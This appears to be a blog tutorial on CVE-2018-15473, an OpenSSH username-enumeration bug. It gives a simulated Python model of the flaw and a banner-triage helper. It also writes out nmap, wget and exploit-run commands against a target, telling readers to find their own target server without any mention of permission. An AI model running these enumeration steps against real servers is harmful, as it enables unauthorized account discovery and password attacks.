by hash3liZer, 26 August 2018
A small defect in the OpenSSH server was recently disclosed: researchers found they could enumerate the usernames registered on a server by abusing the way sshd reacts to a malformed authentication request. For a username that does not exist, the server answers with an authentication failure. For a username that does exist, it goes on to parse the rest of the malformed request, fails, and closes the connection without replying. That difference in behaviour tells the attacker whether the account exists. This is a bug in sshd itself, not a misconfiguration, and all OpenSSH versions up to and including 7.7 are affected; 7.8 is the first release with the fix.
Though the patch has been released, given the size of the install base it will take months before every server is updated. In the meantime an attacker simply compiles a wordlist, runs a mass enumeration against the server, and then uses the confirmed usernames as input for password guessing, where the same kind of automation applies.
The vulnerability has been assigned CVE-2018-15473. In what follows we test a server that has OpenSSH installed.
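To make the "different scenario" concrete, here is a constructed Python model of the defect, added for this article and not taken from OpenSSH or from the exploit script. It imitates the ordering of checks in sshd's publickey handler: before 7.8 the "does this user exist" test ran before the rest of the request had been parsed, so a malformed request for a non-existent user drew a USERAUTH_FAILURE reply, while the same request for an existing user reached the parser, failed, and the connection was torn down. The fixed ordering parses first and checks afterwards, so both kinds of user look the same. KNOWN_USERS, the handler names, the truncated request and the Disconnect exception are all assumptions of the model; the CVE description names the same ordering problem in auth2-gss.c, auth2-hostbased.c and auth2-pubkey.c.

```python
"""Constructed model of the CVE-2018-15473 ordering bug (not OpenSSH source).

Pre-7.8 sshd checked whether the user was valid before it had finished parsing
a publickey authentication request; 7.8 parses first and checks afterwards.
"""
import struct

# Constructed account list standing in for the server's passwd database.
KNOWN_USERS = {"root", "alice", "backup"}


class Disconnect(Exception):
    """Stands in for sshd's fatal(): the connection is closed with no reply."""


def _string(data: bytes) -> bytes:
    """Encode an SSH 'string': uint32 length prefix followed by the bytes (RFC 4251)."""
    return struct.pack(">I", len(data)) + data


def userauth_pubkey_request(user: str, malformed: bool = False) -> bytes:
    """Payload of SSH_MSG_USERAUTH_REQUEST for method "publickey" (RFC 4252 section 7).

    Layout after the message-type byte: string user, string service,
    string "publickey", boolean has_signature, string algorithm, string blob.
    The malformed variant stops right after "publickey", so the boolean is missing.
    Transport framing and the type byte are left out of this model.
    """
    payload = _string(user.encode()) + _string(b"ssh-connection") + _string(b"publickey")
    if malformed:
        return payload
    # Well-formed request: has_signature = FALSE, constructed (bogus) key blob.
    return payload + b"\x00" + _string(b"ssh-rsa") + _string(b"\x00" * 16)


def _read_string(buf: bytes, off: int):
    if off + 4 > len(buf):
        raise Disconnect("truncated string length")
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise Disconnect("truncated string body")
    return buf[off:off + n], off + n


def _read_boolean(buf: bytes, off: int):
    if off >= len(buf):
        raise Disconnect("truncated boolean")
    return buf[off] != 0, off + 1


def _read_header(payload: bytes):
    """user, service, method: the part sshd parses before dispatching on the method."""
    user, off = _read_string(payload, 0)
    service, off = _read_string(payload, off)
    method, off = _read_string(payload, off)
    return user.decode(errors="replace"), service, method, off


def vulnerable_userauth_pubkey(payload: bytes) -> str:
    """Pre-7.8 ordering: unknown user gets an immediate failure reply, rest never parsed."""
    user, _, _, off = _read_header(payload)
    if user not in KNOWN_USERS:
        return "SSH_MSG_USERAUTH_FAILURE"          # early bail-out: this is the leak
    _has_sig, off = _read_boolean(payload, off)   # raises Disconnect on the malformed request
    _alg, off = _read_string(payload, off)
    _blob, off = _read_string(payload, off)
    return "SSH_MSG_USERAUTH_FAILURE"             # the key is bogus, so still a failure


def fixed_userauth_pubkey(payload: bytes) -> str:
    """7.8 ordering: parse the whole request first, only then consult user validity."""
    user, _, _, off = _read_header(payload)
    _has_sig, off = _read_boolean(payload, off)   # malformed input fails here for everyone
    _alg, off = _read_string(payload, off)
    _blob, off = _read_string(payload, off)
    if user not in KNOWN_USERS:
        return "SSH_MSG_USERAUTH_FAILURE"
    return "SSH_MSG_USERAUTH_FAILURE"


def probe(handler, user: str) -> str:
    """What the client observes for one malformed request: 'reply' or 'disconnect'."""
    try:
        handler(userauth_pubkey_request(user, malformed=True))
        return "reply"
    except Disconnect:
        return "disconnect"


def enumerate_users(handler, candidates):
    """Candidates the server hung up on; against a vulnerable sshd these accounts exist."""
    return sorted(u for u in candidates if probe(handler, u) == "disconnect")


if __name__ == "__main__":
    wordlist = ["root", "alice", "mallory", "nobody_here"]   # constructed wordlist
    print("vulnerable ordering:", enumerate_users(vulnerable_userauth_pubkey, wordlist))
    print("fixed ordering:     ", enumerate_users(fixed_userauth_pubkey, wordlist))
```

Run as a script it prints which names from the constructed wordlist the vulnerable ordering gives away; under the fixed ordering every malformed request is dropped, so the oracle has nothing to distinguish. A real client additionally has to tell a deliberate disconnect from a network error or from sshd refusing connections under MaxStartups pressure, which is why results from a mass run against a noisy host deserve a second pass.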
Beyond the obvious accounts such as root, a wordlist run this way can turn up many usernames, including environment-specific ones (service accounts, local naming conventions) that are useful in later stages.
Let's get going:
Find yourself a target server. Port-scan it and look for an OpenSSH service at version 7.7 or earlier (the scan below needs root, since -sS and -O use raw sockets). I already have one; to hide its identity I'll refer to it as redacted.com instead of the real domain. Here's the nmap scan I ran:
$ nmap -sS -sV -O redacted.com
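Whether a host is even worth the enumeration attempt can be decided from its SSH identification string alone. The helper below is an added example for this article, not part of the original post or of the exploit: it reads the banner sshd sends first on connect, extracts the OpenSSH version and compares it numerically against 7.8, the first upstream release carrying the fix. The sample banners are constructed, and the categories are a triage aid only: distributions backport security fixes without bumping the upstream version string, so "candidate" means "test it", not "vulnerable".

```python
"""Constructed helper: triage OpenSSH banners against CVE-2018-15473 (added example)."""
import re
import socket

FIRST_FIXED = (7, 8)  # OpenSSH 7.8 is the first upstream release with the fix

# Identification string per RFC 4253: "SSH-protoversion-softwareversion [comments]".
# OpenSSH reports e.g. "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3"; "pN" is the
# portable-release suffix and the distro comment after the space is ignored.
BANNER_RE = re.compile(r"^SSH-(?:1\.99|2\.0)-OpenSSH_(\d+)\.(\d+)(?:p\d+)?(?:\s|$)")


def openssh_version(banner: str):
    """(major, minor) from an OpenSSH banner, or None when the server is not OpenSSH."""
    m = BANNER_RE.match(banner.strip())
    return (int(m.group(1)), int(m.group(2))) if m else None


def triage(banner: str) -> str:
    """'candidate' for 7.7 and below, 'patched' for 7.8 and above, else 'not-openssh'.

    The tuple compare is deliberate: a string compare would misorder versions
    once the minor number reaches two digits.
    """
    version = openssh_version(banner)
    if version is None:
        return "not-openssh"
    return "candidate" if version < FIRST_FIXED else "patched"


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Fetch the live identification string; sshd sends it before the client says anything."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(255).decode("utf-8", errors="replace").strip()


# Constructed sample banners in the shapes real servers return.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3",
    "SSH-2.0-OpenSSH_7.7",
    "SSH-2.0-OpenSSH_7.9p1 Ubuntu-10",
    "SSH-2.0-OpenSSH_8.2p1",
    "SSH-1.99-OpenSSH_5.3",
    "SSH-2.0-dropbear_2019.78",
]


def triage_all(banners):
    """Map each banner to its triage result."""
    return {banner: triage(banner) for banner in banners}


if __name__ == "__main__":
    for banner, verdict in triage_all(SAMPLE_BANNERS).items():
        print(f"{verdict:12} {banner}")
```

To use it against a real host, call grab_banner("redacted.com", 2222) and pass the result to triage(). Note that nmap -sV prints a normalised product string rather than the raw banner, so feed this helper what the socket returns, not nmap's output.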
The exploit is available on Exploit-DB under ID 45233, written by Justin Gardner. It is a Python script that depends on the paramiko library.
$ wget https://www.exploit-db.com/download/45233.py
Run the script against a single username:
$ python 45233.py --port [port] --username [username] redacted.com
Or, for a list of candidate usernames:
$ python 45233.py --port [port] --userList [/path/to/file] --threads 10 redacted.com
In our case, the server listens on port 2222 and we start with root:
$ python 45233.py --port 2222 --username root redacted.com
Stay alert and always keep your applications up to date. For this issue that means OpenSSH 7.8 or later, or a distribution package that carries the backported fix.